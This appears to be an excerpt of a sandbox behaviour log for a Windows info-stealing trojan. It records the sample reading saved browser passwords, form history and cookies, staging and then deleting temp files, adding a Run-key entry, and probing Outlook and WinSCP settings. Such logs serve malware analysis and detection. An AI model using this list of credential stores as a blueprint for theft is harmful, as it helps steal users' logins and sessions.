Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@turn[1].txt	type = size, size_out = 87	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@w55c[2].txt	type = size, size_out = 89	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.bing[1].txt	type = size, size_out = 117	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.linkedin[1].txt	type = size, size_out = 168	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.msn[2].txt	type = size, size_out = 1003	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Cookies	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	type = size, size_out = 12707	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys	type = file_attributes	30	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 0	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	type = attributes,time,size,volserialno	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	type = size, size_out = 319	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 17146	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	type = size, size_out = 1072	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 17779	1	Fn
Copy	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	source_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608, size_out = 196608	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	size = 171, size_out = 171	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	size = 4096, size_out = 4096	80	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 4096, size_out = 4096	16	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 4096, size_out = 4096	4	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 4096, size_out = 2048	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 4096, size_out = 4096	16	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	size = 4096, size_out = 4096	48	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@g.live[1].txt	size = 64, size_out = 64	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@google[1].txt	size = 278, size_out = 278	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@live[1].txt	size = 95, size_out = 95	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad.360yield[2].txt	size = 443, size_out = 443	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad13.adfarm1.adition[2].txt	size = 89, size_out = 89	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@addthis[2].txt	size = 179, size_out = 179	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adfarm1.adition[2].txt	size = 101, size_out = 101	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adformdsp[2].txt	size = 93, size_out = 93	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adform[2].txt	size = 302, size_out = 302	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adnxs[2].txt	size = 745, size_out = 745	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adscale[1].txt	size = 87, size_out = 87	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adserving.ancoraplatform[2].txt	size = 251, size_out = 251	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adsrvr[1].txt	size = 243, size_out = 243	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adtech[2].txt	size = 102, size_out = 102	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@advertising[1].txt	size = 280, size_out = 280	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@angsrvr[2].txt	size = 222, size_out = 222	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@api.bing[2].txt	size = 223, size_out = 223	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@at.atwola[2].txt	size = 515, size_out = 515	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bidswitch[1].txt	size = 289, size_out = 289	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bing[1].txt	size = 264, size_out = 264	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bluekai[1].txt	size = 162, size_out = 162	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[1].txt	size = 93, size_out = 93	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[3].txt	size = 111, size_out = 111	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.bing[1].txt	size = 560, size_out = 560	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.msn[2].txt	size = 130, size_out = 130	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c1.microsoft[2].txt	size = 144, size_out = 144	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@casalemedia[2].txt	size = 537, size_out = 537	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@connextra[2].txt	size = 325, size_out = 325	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@crwdcntrl[1].txt	size = 296, size_out = 296	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@demdex[1].txt	size = 111, size_out = 111	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@doubleclick[2].txt	size = 274, size_out = 274	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@dpm.demdex[1].txt	size = 112, size_out = 112	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@exelator[1].txt	size = 342, size_out = 342	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@eyeota[1].txt	size = 103, size_out = 103	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@google[2].txt	size = 194, size_out = 194	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ibeu2.mookie1[2].txt	size = 311, size_out = 311	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ih.adscale[1].txt	size = 129, size_out = 129	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@linkedin[2].txt	size = 269, size_out = 269	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@m.exactag[2].txt	size = 118, size_out = 118	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@mathtag[2].txt	size = 289, size_out = 289	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@microsoft[1].txt	size = 577, size_out = 577	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@msn[2].txt	size = 823, size_out = 823	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@openx[1].txt	size = 114, size_out = 114	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pixel.rubiconproject[1].txt	size = 111, size_out = 111	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pubmatic[2].txt	size = 187, size_out = 187	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@rubiconproject[1].txt	size = 298, size_out = 298	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@scorecardresearch[2].txt	size = 204, size_out = 204	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@semasio[1].txt	size = 90, size_out = 90	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@server.adformdsp[2].txt	size = 108, size_out = 108	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving-sys[2].txt	size = 460, size_out = 460	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving.experianmarketingservices[1].txt	size = 413, size_out = 413	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@smartadserver[1].txt	size = 287, size_out = 287	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@tapad[2].txt	size = 198, size_out = 198	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@track.adform[2].txt	size = 177, size_out = 177	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@turn[1].txt	size = 87, size_out = 87	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@w55c[2].txt	size = 89, size_out = 89	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.bing[1].txt	size = 117, size_out = 117	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.linkedin[1].txt	size = 168, size_out = 168	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@www.msn[2].txt	size = 1003, size_out = 1003	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	size = 4096, size_out = 4096	128	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Cookies	size = 4096, size_out = 4096	7	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Cookies	size = 4096, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	size = 12707, size_out = 12707	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	size = 32768, size_out = 291	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol	size = 32477, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	size = 8, size_out = 8	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	size = 199, size_out = 199	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	size = 8, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	size = 16, size_out = 16	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	size = 256, size_out = 52	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	size = 16, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	size = 8, size_out = 8	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	size = 8, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	size = 32768, size_out = 68	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	size = 32768, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	size = 32768, size_out = 207	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	size = 32768, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 319, size_out = 319	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 17146, size_out = 17146	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	size = 1072, size_out = 1072	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 17779, size_out = 17779	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	size = 12707	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 17146	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	size = 16	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	size = 52	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	size = 8	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	size = 199	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	size = 8	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	size = 199	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	size = 8	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	size = 16	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	size = 52	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 36	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 8	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 68	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 207	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	size = 4	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 17779	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	size = 1072	1	Fn Data
Write	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	size = 19413	1	Fn Data
Delete	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cooB07B.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\flaB08C.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08D.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08E.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB08F.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB090.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB091.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB092.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A3.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A4.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A5.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\cabB0A6.tmp	-	2	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\sofB0D5.tmp	-	2	Fn

Registry (1149)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	6	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	7	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	13	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter	-	9	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs	-	9	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs	-	7	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	-	7	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	-	5	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall	-	7	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	3	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin	-	5	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions	-	7	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Identities	-	1	Fn
Open Key	HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	30	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	22	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	-	30	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Mail	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Mozilla\Firefox	-	5	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox	-	4	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0	-	4	Fn
Open Key	HKEY_CURRENT_USER\Software\Martin Prikryl	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Martin Prikryl	-	1	Fn
